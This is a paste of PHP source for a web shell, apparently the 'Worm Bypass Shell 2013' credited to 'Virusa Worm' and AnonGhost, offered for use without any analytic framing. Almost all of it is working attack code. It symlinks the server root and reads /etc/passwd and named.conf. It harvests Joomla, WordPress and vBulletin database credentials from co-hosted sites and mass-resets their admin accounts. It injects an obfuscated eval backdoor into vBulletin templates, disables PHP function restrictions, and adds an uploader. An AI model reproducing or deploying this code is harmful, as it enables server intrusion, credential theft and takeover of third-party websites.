- $bforb = 'PGhlYWQ+PHRpdGxlPkJ5cGFzcyBGb3JiaWRkZW4gYnkgVmlydXNhIFdvcm08L3RpdGxlPjwvaGVhZD48bGluayByZWw9InNob3J0Y3V0IGljb24iIGhyZWY9Imh0dHA6Ly93d3cuaWNvbmouY29tL2ljby9jL3UvY3UxYm1wZ2Ixay5pY28iIHR5cGU9ImltYWdlL3gtaWNvbiIgLz48c3R5bGUgdHlwZT0idGV4dC9jc3MiPjwhLS0gYm9keSB7YmFja2dyb3VuZC1jb2xvcjogIzE1MTUxNTsgZm9udC1mYW1pbHk6Q291cmllcgltYXJnaW4tbGVmdDogMHB4OyBtYXJnaW4tdG9wOiAwcHg7IHRleHQtYWxpZ246IGNlbnRlcjsgTmV3O2ZvbnQtc2l6ZToxMnB4O2NvbG9yOiMwMDk5MDA7Zm9udC13ZWlnaHQ6NDAwO30gYXt0ZXh0LWRlY29yYXRpb246bm9uZTt9IGE6bGluayB7Y29sb3I6IzAwOTkwMDt9IGE6dmlzaXRlZCB7Y29sb3I6IzAwODA4MDt9IGE6aG92ZXJ7Y29sb3I6I2ZmMDAwMDt9IGE6YWN0aXZlIHtjb2xvcjojMDBhMmEyO30gLS0+PCEtLSBNYWRlIEJ5IFZpcnVzYSBXb3JtIC0tPjwvc3R5bGU+PGJyPjxicj48Ym9keSBiZ0NvbG9yPSIxNTE1MTUiPjx0cj48dGQ+PD9waHAgZWNobyAiPGZvcm0gbWV0aG9kPSdQT1NUJyBhY3Rpb249Jyc+IiA7IGVjaG8gIjxjZW50ZXI+PGlucHV0IHR5cGU9J3N1Ym1pdCcgdmFsdWU9J0J5cGFzcyBpdCcgbmFtZT0ndmlydXNhJz48L2NlbnRlcj4iOyBpZiAoaXNzZXQoJF9QT1NUWyd2aXJ1c2EnXSkpeyBzeXN0ZW0oJ2xuIC1zIC8gdmlydXNhLnR4dCcpOyAkZnZja2VtID0nVDNCMGFXOXVjeUJKYm1SbGVHVnpJRVp2Ykd4dmQxTjViVXhwYm10ekRRcEVhWEpsWTNSdmNubEpibVJsZUNCemMzTnpjM011YUhSdERRcEJaR1JVZVhCbElIUjRkQ0F1Y0dod0RRcEJaR1JJWVc1a2JHVnlJSFI0ZENBdWNHaHcnOyAkZmlsZSA9IGZvcGVuKCIuaHRhY2Nlc3MiLCJ3KyIpOyAkd3JpdGUgPSBmd3JpdGUgKCRmaWxlICxiYXNlNjRfZGVjb2RlKCRmdmNrZW0pKTsgJHZpcnVzYSA9IHN5bWxpbmsoIi8iLCJ2aXJ1c2EudHh0Iik7ICRydD0iPGJyPjxhIGhyZWY9dmlydXNhLnR4dCBUQVJHRVQ9J19ibGFuayc+PGZvbnQgY29sb3I9I2ZmMDAwMCBzaXplPTIgZmFjZT0nQ291cmllciBOZXcnPjxiPkJ5cGFzc2VkIFN1Y2Nlc3NmdWxseTwvYj48L2ZvbnQ+PC9hPiI7IGVjaG8gIjxicj48YnI+PGI+RG9uZS4uICE8L2I+PGJyPjxicj5DaGVjayBsaW5rIGdpdmVuIGJlbG93IGZvciAvIGZvbGRlciBzeW1saW5rIDxicj4kcnQ8L2NlbnRlcj4iO30gZWNobyAiPC9mb3JtPiI7ICA/PjwvdGQ+PC90cj48L2JvZHk+PC9odG1sPg==';
- $file = fopen("bforb.php", "w+");
- $write = fwrite($file, base64_decode($bforb));
- fclose($file);
- chmod("bforb.php", 0755);
- echo "<iframe src=bforb/bforb.php width=60% height=60% frameborder=0></iframe>";
- break;
- case 'sym':
- echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Symlink Server</font></b><br><br>';
- if (!is_file('named.txt')) {
- $d00m = @file("/etc/named.conf");
- } else {
- $d00m = @file("named.txt");
- }
- if (!$d00m) {
- die("<meta http-equiv='refresh' content='0; url=?vw=read'/>");
- } else {
- echo "<div class='tmp'><table align='center' width='40%'><td><font color='#b3b3b3'><b>Domains</b></font></td><td><font color='#b3b3b3'><b>Users</b></font></td><td><font color='#b3b3b3'><b>symlink</b> </font></td>";
- foreach ($d00m as $dom) {
- if (eregi("zone", $dom)) {
- preg_match_all('#zone "(.*)"#', $dom, $domvw);
- flush();
- if (strlen(trim($domvw[1][0])) > 2) {
- $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domvw[1][0]));
- flush();
- $site = $user['name'];
- @symlink("/", "sim/rut");
- $site = $domvw[1][0];
- $ir = 'ir';
- $il = 'il';
- if (preg_match("/.^$ir/", $domvw[1][0]) or preg_match("/.^$il/", $domvw[1][0])) {
- $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>" . $domvw[1][0] . "</div>";
- }
- echo "
- <tr>
- <td>
- <div class='cone'><a target='_blank' href=http://www." . $domvw[1][0] . "/>" . $site . " </a> </div>
- </td>
- <td><font face='Tahoma' color='#d0d000' size='2pt'>
- " . $user['name'] . "
- </td></font>
- <td>
- <div class='cone'><a href='sim/rut/home/" . $user['name'] . "/public_html' target='_blank'>symlink </a></div>
- </td>
- </tr></div> ";
- flush();
- flush();
- }
- }
- }
- }
- echo "</table></div><br><br>";
- break;
- case 'file':
- echo '
- <br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Symlink Manual</font></b>
- <br /><br />
- <form method="post">
- <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
- <input type="text" name="symfile" value="file name symlink .txt" size="60"/><br /><br />
- <input type="submit" value="symlink" name="symlink" /> <br /><br />
- </form>
- ';
- $pfile = $_POST['file'];
- $symfile = $_POST['symfile'];
- $symlink = $_POST['symlink'];
- if ($symlink) {
- @mkdir('simfel', 0777);
- $c = "Options Indexes FollowSymLinks
- DirectoryIndex ssssss.htm
- AddType txt .php
- AddHandler txt .php
- AddType txt .html
- AddHandler txt .html
- Options all
- Options
- Allow from all
- Require None
- Satisfy Any";
- $f = @fopen('simfel/.htaccess', 'w');
- @fwrite($f, $c);
- @symlink("$pfile", "simfel/$symfile");
- echo '<br /><font face="Tahoma" color="#009900" size="3pt"><b>Done.. !</b><br></font><div class="cont" align="center"><font face="Tahoma" color="#009900" size="2pt">Open this file -> <a target="_blank" href="simfel/' . $symfile . '" >' . $symfile . '</a></font></div>';
- }
- break;
- case 'read':
- echo "<br><b class='cont' align='center'><font face='Tahoma' color='#009900' size='3pt'>Read /etc/passwd</font></b>";
- echo "<br /><br /><form method='post' action='?vw=read&save=1'><textarea cols='80' rows='15' name='file'>";
- flush();
- flush();
- $file = '/etc/named.conf';
- $w0co = @fopen($file, 'r');
- if ($w0co) {
- $content = @fread($w0co, @filesize($file));
- echo "" . htmlentities($content) . "";
- } else if (!$w0co) {
- $w0co = @show_source($file);
- } else if (!$w0co) {
- $w0co = @highlight_file($file);
- } else if (!$w0co) {
- $sm = @symlink($file, 'sym.txt');
- if ($sm) {
- $w0co = @fopen('sim/sym.txt', 'r');
- $content = @fread($w0co, @filesize($file));
- echo "" . htmlentities($content) . "";
- }
- }
- echo "</textarea><br /><br /><input type='submit' value='Save'/> </form>";
- if (isset($_GET['save'])) {
- $cont = stripcslashes($_POST['file']);
- $f = fopen('named.txt', 'w');
- $w = fwrite($f, $cont);
- if ($w) {
- echo '<br />save has been successfully';
- }
- fclose($f);
- }
- break;
- case 'passwd':
- echo '<br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Read /etc/passwd</font></b>';
- if (isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0) {
- $cont = stripcslashes($_POST['file']);
- if (!file_exists('passwd.txt')) {
- $f = @fopen('passwd.txt', 'w');
- $w = @fwrite($f, $cont);
- fclose($f);
- }
- if ($w or @filesize('passwd.txt') > 0) {
- echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td></div>";
- flush();
- $fil3 = file('passwd.txt');
- foreach ($fil3 as $f) {
- $u = explode(':', $f);
- $user = $u['0'];
- echo "
- <tr>
- <td width='15%'>
- $user
- </td>
- <td width='10%'><div class='cone'>
- <a href='sim/rut/home/$user/public_html' target='_blank'>Symlink </a></div>
- </td>
- <td width='10%'><div class='cone'>
- <a href='$pageFTP/sim/rut/home/$user/public_html' target='_blank'>FTP</a></div>
- </td>
- </tr></div> ";
- flush();
- flush();
- }
- die("</tr></div>");
- }
- }
- echo "<br /><br /><form method='post' action='?vw=passwd&save=1'><textarea cols='80' rows='15' name='file'>";
- flush();
- $file = '/etc/passwd';
- $w0co = @fopen($file, 'r');
- if ($w0co) {
- $content = @fread($w0co, @filesize($file));
- echo "" . htmlentities($content) . "";
- } elseif (!$w0co) {
- $w0co = @show_source($file);
- } elseif (!$w0co) {
- $w0co = @highlight_file($file);
- } elseif (!$w0co) {
- for ($uid = 0;$uid < 1000;$uid++) {
- $ara = posix_getpwuid($uid);
- if (!empty($ara)) {
- while (list($key, $val) = each($ara)) {
- print "$val:";
- }
- print "
- ";
- }
- }
- }
- flush();
- echo "</textarea><br /><br /><input type='submit' value=' symlink '/> </form>";
- flush();
- break;
- case 'joomla':
- if (isset($_POST['s'])) {
- $file = @file_get_contents('joomla.txt');
- $ex = explode("
- ", $file);
- echo "<div class='tmp'><table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b></font></td><td> <font color='#b3b3b3'><b>Configs </b></font></td><td> <font color='#b3b3b3'><b>Result </b></font></td></div>";
- flush();
- foreach ($ex as $exp) {
- $es = explode("||", $exp);
- $config = $es[0];
- $domin = $es[1];
- $domins = trim($domin) . '';
- $readconfig = @file_get_contents(trim($config));
- if (ereg('JConfig', $readconfig)) {
- $pass = ex($readconfig, '$password = \'', "';");
- $userdb = ex($readconfig, '$user = \'', "';");
- $db = ex($readconfig, '$db = \'', "';");
- $fix = ex($readconfig, '$dbprefix = \'', "';");
- $tab = $fix . 'users';
- $con = @mysql_connect('localhost', $userdb, $pass);
- $db = @mysql_select_db($db, $con);
- $query = @mysql_query("UPDATE `$tab` SET `username` ='virusa'");
- $query3 = @mysql_query("UPDATE `$tab` SET `password` ='0a3329119bf465dce95057a37ec91152:TL1fIDogLJU4bHHcgQWETu8GN67fUd8'");
- if ($query and $query3) {
- $r = '<b style="color: #006600">Succeed </b>user [virusa] pass [worm]</b>';
- } else {
- $r = '<b style="color:red">failed</b>';
- }
- $domins = trim($domin) . '';
- echo "<tr>
- <td><div class='cone'><a target='_blank' href='http://$domins'>$domin</a></div></td>
- <td><div class='cone'><a target='_blank' href='$config'>config</a></td><td>" . $r . "</td></div></tr>";
- flush();
- } else {
- echo "<tr>
- <td><div class='cone'><a target='_blank' href='http://$domins'>$domin</a></div></td>
- <td><div class='cone'><a target='_blank' href='http://$exp'>config</a></div></td><td><b style='color:red'>failed</b></td></tr>";
- flush();
- }
- }
- die();
- }
- if (!is_file('named.txt')) {
- $d00m = @file("/etc/named.conf");
- flush();
- } else {
- $d00m = file("named.txt");
- }
- if (!$d00m) {
- die("<meta http-equiv='refresh' content='0; url=?vw=read'/>");
- } else {
- echo "<br><b class='cont' align='center'><font face='Tahoma' color='#009900' size='3pt'>Mass Joomla</font></b><br><br><div class='tmp'>
- <form method='POST' action='$pg?vw=joomla'>
- <input type='submit' value='Mass change Admin' />
- <input type='hidden' value='1' name='s' />
- </form><br>
- <table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b></font></td><td> <font color='#b3b3b3'><b>config </b></font></td><td> <font color='#b3b3b3'><b>Result </b></font></td>";
- $f = fopen('joomla.txt', 'w');
- foreach ($d00m as $dom) {
- if (eregi("zone", $dom)) {
- preg_match_all('#zone "(.*)"#', $dom, $domvw);
- if (strlen(trim($domvw[1][0])) > 2) {
- $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domvw[1][0]));
- $wpl = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/configuration.php";
- $wpp = get_headers($wpl);
- $wp = $wpp[0];
- $wp2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/blog/configuration.php";
- $wpp2 = get_headers($wp2);
- $wp12 = $wpp2[0];
- $wp3 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/joomla/configuration.php";
- $wpp3 = get_headers($wp3);
- $wp13 = $wpp3[0];
- $pos = strpos($wp, "200");
- $config = " ";
- if (strpos($wp, "200") == true) {
- $config = $wpl;
- } elseif (strpos($wp12, "200") == true) {
- $config = $wp2;
- } elseif (strpos($wp13, "200") == true) {
- $config = $wp3;
- } else {
- continue;
- }
- flush();
- $dom = $domvw[1][0];
- $w = fwrite($f, "$config||$dom
- ");
- if ($w) {
- $r = '<b style="color: #006600">Save</b>';
- } else {
- $r = '<b style="color:red">failed</b>';
- }
- echo "<tr><td><div class='cone'><a href=http://www." . $domvw[1][0] . ">" . $domvw[1][0] . "</a></div></td>
- <td><div class='cone'><a href='$config'>config</a></div></td><td>" . $r . "</td></tr>";
- flush();
- }
- }
- }
- }
- echo "</table></div><br><br>";
- break;
- case 'wp':
- if (isset($_POST['s'])) {
- $file = @file_get_contents('wp.txt');
- $ex = explode("
- ", $file);
- echo "<div class='tmp'><table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b></font></td><td> <font color='#b3b3b3'><b>Configs </b></font></td><td> <font color='#b3b3b3'><b>Result </b></font></td></div>";
- flush();
- flush();
- foreach ($ex as $exp) {
- $es = explode("||", $exp);
- $config = $es[0];
- $domin = $es[1];
- $domins = trim($domin) . '';
- $readconfig = @file_get_contents(trim($config));
- if (ereg('wp-settings.php', $readconfig)) {
- $pass = ex($readconfig, "define('DB_PASSWORD', '", "');");
- $userdb = ex($readconfig, "define('DB_USER', '", "');");
- $db = ex($readconfig, "define('DB_NAME', '", "');");
- $fix = ex($readconfig, '$table_prefix = \'', "';");
- $tab = $fix . 'users';
- $con = @mysql_connect('localhost', $userdb, $pass);
- $db = @mysql_select_db($db, $con);
- $query = @mysql_query("UPDATE `$tab` SET `user_login` ='virusa'") or die;
- $query = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
- if ($query) {
- $r = '<b style="color: #006600">Succeed </b>user [virusa] pass [1]</b>';
- } else {
- $r = '<b style="color:red">failed</b>';
- }
- $domins = trim($domin) . '';
- echo "<tr>
- <td><div class='cone'><a target='_blank' href='http://$domins'>$domin</a></div></td>
- <td><div class='cone'><a target='_blank' href='$config'>config</a></div></td><td>" . $r . "</td></tr>";
- flush();
- flush();
- } else {
- echo "<tr>
- <td><div class='cone'><a target='_blank' href='http://$domins'>$domin</a></div></td>
- <td><div class='cone'><a target='_blank' href='http://$config'>config</a></div></td><td><b style='color:red'>failed2</b></td></tr>";
- flush();
- flush();
- }
- }
- die();
- }
- if (!is_file('named.txt')) {
- $d00m = @file("/etc/named.conf");
- } else {
- $d00m = @file("named.txt");
- }
- if (!$d00m) {
- die("<meta http-equiv='refresh' content='0; url=?vw=read'/>");
- } else {
- echo "<br><b class='cont' align='center'><font face='Tahoma' color='#009900' size='3pt'>Mass WordPress</font></b><br><br><div class='tmp'>
- <form method='POST' action='$pg?vw=wp'>
- <input type='submit' value='Mass Change Admin' />
- <input type='hidden' value='1' name='s' />
- </form>
- <br>
- <table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b></font></td><td> <font color='#b3b3b3'><b>config </b></font></td><td> <font color='#b3b3b3'><b>Result </b></font></td>";
- flush();
- flush();
- $f = fopen('wp.txt', 'w');
- foreach ($d00m as $dom) {
- if (eregi("zone", $dom)) {
- preg_match_all('#zone "(.*)"#', $dom, $domvw);
- if (strlen(trim($domvw[1][0])) > 2) {
- $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domvw[1][0]));
- $wpl = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/wp-config.php";
- $wpp = get_headers($wpl);
- $wp = $wpp[0];
- $wp2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/blog/wp-config.php";
- $wpp2 = get_headers($wp2);
- $wp12 = $wpp2[0];
- $wp3 = $pageURL . "/sim/rut/home/" . $user['name'] . "/public_html/wp/wp-config";
- $wpp3 = get_headers($wp3);
- $wp13 = $wpp3[0];
- $pos = strpos($wp, "200");
- $config = " ";
- if (strpos($wp, "200") == true) {
- $config = $wpl;
- } elseif (strpos($wp12, "200") == true) {
- $config = $wp2;
- } elseif (strpos($wp13, "200") == true) {
- $config = $wp3;
- } else {
- continue;
- }
- flush();
- $dom = $domvw[1][0];
- $w = fwrite($f, "$config||$dom
- ");
- if ($w) {
- $r = '<b style="color: #006600">Save</b>';
- } else {
- $r = '<b style="color:red">failed</b>';
- }
- echo "<tr><td><div class='cone'><a href=http://www." . $domvw[1][0] . ">" . $domvw[1][0] . "</a></div></td>
- <td><div class='cone'><a href='$config'>config</a></div></td><td>" . $r . "</td></tr>";
- flush();
- flush();
- flush();
- }
- }
- }
- }
- echo "</table></div><br><br>";
- break;
- case 'vb':
- if (isset($_POST['s'])) {
- $file = @file_get_contents('vb.txt');
- $ex = explode("
- ", $file);
- echo "<div class='tmp'><table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b><font></td><td> <font color='#b3b3b3'><b>Configs </b><font></td><td> <font color='#b3b3b3'><b>Result </b><font></td></div>";
- foreach ($ex as $exp) {
- $es = explode("||", $exp);
- $config = $es[0];
- $domin = $es[1];
- $domins = trim($domin) . '';
- $readconfig = @file_get_contents(trim($config));
- if (ereg('vBulletin', $readconfig)) {
- $db = ex($readconfig, '$config[\'Database\'][\'dbname\'] = \'', "';");
- $userdb = ex($readconfig, '$config[\'MasterServer\'][\'username\'] = \'', "';");
- $pass = ex($readconfig, '$config[\'MasterServer\'][\'password\'] = \'', "';");
- $con = @mysql_connect('localhost', $userdb, $pass);
- $db = @mysql_select_db($db, $con);
- $shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==";
- $crypt = "{\${eval(gzinflate(base64_decode(\'";
- $crypt.= "$shell";
- $crypt.= "\')))}}{\${exit()}}</textarea>";
- $sqlfaq = "UPDATE template SET template ='" . $crypt . "' WHERE title ='FAQ'";
- $query = @mysql_query($sqlfaq, $con);
- if ($query) {
- $r = '<b style="color: #006600">Succeed</b> shell in search.php';
- } else {
- $r = '<b style="color:red">failed</b>';
- }
- $domins = trim($domin) . '';
- echo "<tr>
- <td><div class='cone'><a target='_blank' href='http://$domins'>$domin</a></div></td>
- <td><div class='cone'><a target='_blank' href='$config'>config</a></div></td><td>" . $r . "</td></tr>";
- } else {
- echo "<tr>
- <td><div class='cone'><a target='_blank' href='http://$domins'>$domin</a></div></td>
- <td><div class='cone'><a target='_blank' href='http://$config'>config</a></div></td><td><b style='color:red'>failed2</b></td></tr>";
- }
- }
- die();
- }
- if (!is_file('named.txt')) {
- $d00m = file("/etc/named.conf");
- } else {
- $d00m = file("named.txt");
- }
- if (!$d00m) {
- die("<meta http-equiv='refresh' content='0; url=?vw=read'/>");
- } else {
- echo "<br><b class='cont' align='center'><font face='Tahoma' color='#009900' size='3pt'>Mass vBulletin</font></b><br><br><div class='tmp'>
- <form method='POST' action='$pg?vw=vb'>
- <input type='submit' value='Inject shell' />
- <input type='hidden' value='1' name='s' />
- </form>
- <br>
- <table align='center' width='40%'><td> <font color='#b3b3b3'><b>Domains </b></font></td><td> <font color='#b3b3b3'><b>config </b></font></td><td> <font color='#b3b3b3'><b>Result </b></font></td>";
- $f = fopen('vb.txt', 'w');
- foreach ($d00m as $dom) {
- if (eregi("zone", $dom)) {
- preg_match_all('#zone "(.*)"#', $dom, $domvw);
- if (strlen(trim($domvw[1][0])) > 2) {
- $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domvw[1][0]));
- ///////////////////////////////////////////////////////////////////////////////////
- $wpl = $pageURL . "/sim/rut/home/" . $user['name'] . "/includes/config.php";
- $wpp = get_headers($wpl);
- $wp = $wpp[0];
- $wp2 = $pageURL . "/sim/rut/home/" . $user['name'] . "/vb/includes/config.php";
- $wpp2 = get_headers($wp2);
- $wp12 = $wpp2[0];
- $wp3 = $pageURL . "/sim/rut/home/" . $user['name'] . "/forum/includes/config.php";
- $wpp3 = get_headers($wp3);
- $wp13 = $wpp3[0];
- ////////// vb ////////////
- $pos = strpos($wp, "200");
- $config = " ";
- if (strpos($wp, "200") == true) {
- $config = $wpl;
- } elseif (strpos($wp12, "200") == true) {
- $config = $wp2;
- } elseif (strpos($wp13, "200") == true) {
- $config = $wp3;
- } else {
- continue;
- }
- flush();
- /////////////////////////////////////////////////////////////////////////////////////
- $dom = $domvw[1][0];
- $w = fwrite($f, "$config||$dom
- ");
- if ($w) {
- $r = '<b style="color: #006600">Save</b>';
- } else {
- $r = '<b style="color:red">failed</b>';
- }
- echo "<tr><td><div class='cone'><a href=http://www." . $domvw[1][0] . ">" . $domvw[1][0] . "</a></div></td>
- <td><div class='cone'><a href='$config'>config</a></div></td><td>" . $r . "</td></tr>";
- flush();
- }
- }
- }
- }
- echo "</table></div><br><br>";
- break;
- /// aplot start ///
- case 'aplot':
- echo '
- <br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Uploader</font></b><br><br><center>';
- echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
- echo '<input type="file" name="file" value="Choose file" size="60" > <input name="_upl" type="submit" id="_upl" value="Upload"></form>';
- if ($_POST['_upl'] == "Upload") {
- if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
- echo '<br /><br /><b>upload sukses.. <img src="http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif"><br><br>';
- } else {
- echo '<br /><br />aseeeemmm.., ora iso upload <img src="http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/24.gif"><br><br>';
- }
- }
- break;
- case 'abot':
- echo '
- <br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Sekilas Info</font></b><br><br><br><br><center>
- <center>
- ' . base64_decode("PGltZyBzcmM9Imh0dHA6Ly9pOTUyLnBob3RvYnVja2V0LmNvbS9hbGJ1bXMvYWUxL3ZpcnVzYXdvcm0vbGcxX3pwc2E4OWU1MjEyLmpwZyIgLz4=") . '
- <br><br><font color="#006600" size="1pt">Coded by </font><font color="#00aa00" size="1pt">Virusa Worm</font><br><br><br><br><font color="#00aa00" size="1pt">Worm Bypass </font><font face="Tahoma" color="#b3b3b3" size="1pt">Shell 2013</font> <font color="#006600" size="1pt">include Several script which has recoded to make this shell.</font><br><br><font color="#006600" size="1pt">so.. try to figure it out if this shell not work in different server, and use ur brain.<br>learn to figure it out about something it\'s make be better.<br><br><font color="#b0b000" size="1pt">"</font>tools not make hacker, but try to learn about tools. tried to find out why it\'s tool works. it\'s will be better than nothing.. <font color="#b0b000" size="1pt">"</font><br><br><br><font color="#006600" size="1pt">Special thankz to : </font><br><font color="#009900" size="1pt">My best Brother Mauritania Attacker<br><br><font color="#006600" size="1pt">thankz to : </font><br>
- All Members AnonGhost Team - Tanpa Bicara - Maniak k4Sur </font><font color="#006600" size="1pt">[pasangan galo.. lol..]</font><br><br>Greetz to :</font><br><font color="#b0b000" size="1pt">AnonGhost - Mauritania HaCker Team - X-Blackerz INC - ZHC </font><font color="#006600" size="1pt"></center>
- ';
- break;
- case 'mati':
- echo '
- <br><b class="cont" align="center"><font face="Tahoma" color="#009900" size="3pt">Suicide</font></b><br><br><center>'; {
- echo '<center><font color="#c00000"><b>Do you really want to delete this shell ?</b></font></center><br>';
- ?>
- <b class="cone" align="center"><a href="?action=mateni">Yes</a> </b>
- <b class="cone" align="center"><a href="<?php echo $_SERVER['PHP_SELF']; ?>">No</a></b>
- <?php
- }
- if ($action == "mateni") {
- $file = $_SERVER['PHP_SELF'];
- $file = str_replace('/', '', $file);
- unlink($file);
- echo '<center><font color="#c00000">Bitch u killed me..!</font></center>';
- header('refresh: 2; ' . $_SERVER['PHP_SELF'] . '');
- }
- break;
- /// logout ///
- case 'metu':
- unset($_SESSION['login']);
- echo "<meta http-equiv='refresh' content='0; url=?" . $pwd . "' />";
- echo '<center><font color="#006600">Logout out.</font></center>';
- break;
- default:
- header("Location: $pg");
- }
- /// home ///
- } else {
- if ($_POST['pateni'] == 'sikat') {
- @error_reporting(0);
- $phpini = 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
- $file = fopen("php.ini", "w+");
- $write = fwrite($file, base64_decode($phpini));
- fclose($file);
- $htaccess = 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
- $file = fopen(".htaccess", "w+");
- $write = fwrite($file, base64_decode($htaccess));
- echo '<br><br><br><font face="Tahoma" color="#006600" size="3pt"><b>Bypassed !</b>';
- exit;
- }
- echo '
- <br><center><font face="Tahoma" color="#006600" size="2pt"><b>Disable Function :
- <form method="POST">
- <input name="pateni" type="hidden" value="sikat">';
- if ('' == ($func = @ini_get('disable_functions'))) {
- echo "<font color=#00aa00>No Security for Function</font>";
- } else {
- echo '<font color=#d0d000>[ <blink>Please Bypass First!</blink> ]</font><br>';
- echo "<font color=red>$func</font>";
- echo '<br><br><input type="submit" value="Bypass Disable Function">';
- }
- echo '</b></font></center>';
- echo '<br><center>
- ' . base64_decode("PGltZyBzcmM9Imh0dHA6Ly9pOTUyLnBob3RvYnVja2V0LmNvbS9hbGJ1bXMvYWUxL3ZpcnVzYXdvcm0vbGcxX3pwc2E4OWU1MjEyLmpwZyIgLz4=") . '
- <br><br><font face="Tahoma" color="#006600" size="1pt">Coded by </font><font face="Tahoma" color="#00bb00" size="1pt">Virusa Worm</font><br><br><br><br><br><font face="Tahoma" color="#006600" size="1pt">Special Thankz to :</font><br><font face="Tahoma" color="#00bb00" size="1pt">My best Brother Mauritania Attacker</font><br><br><br><font face="Tahoma" color="#006600" size="1pt">Greetz to : </font><br><font face="Tahoma" color="#00bb00" size="1pt">All Members AnonGhost Team <br>Tanpa Bicara and Maniak k4Sur </font><font color="#006600" size="1pt">[pasangan galo.. lol..]</font></center>';
- }
- function ex($text, $a, $b) {
- $explode = explode($a, $text);
- $explode = explode($b, $explode[1]);
- return $explode[0];
- }
- echo '</div>
- <footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:rgb(21,21,21); text-align:center; border-top: 1px solid #009900; border-bottom: 1px solid #009900"><font color=#009900 size=1 face="Tahoma">' . base64_decode("JmNvcHk7IFdvcm0gQnlwYXNzIFNoZWxsIDIwMTM=") . '</font></footer>
- </body>
- </html>
- ';
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
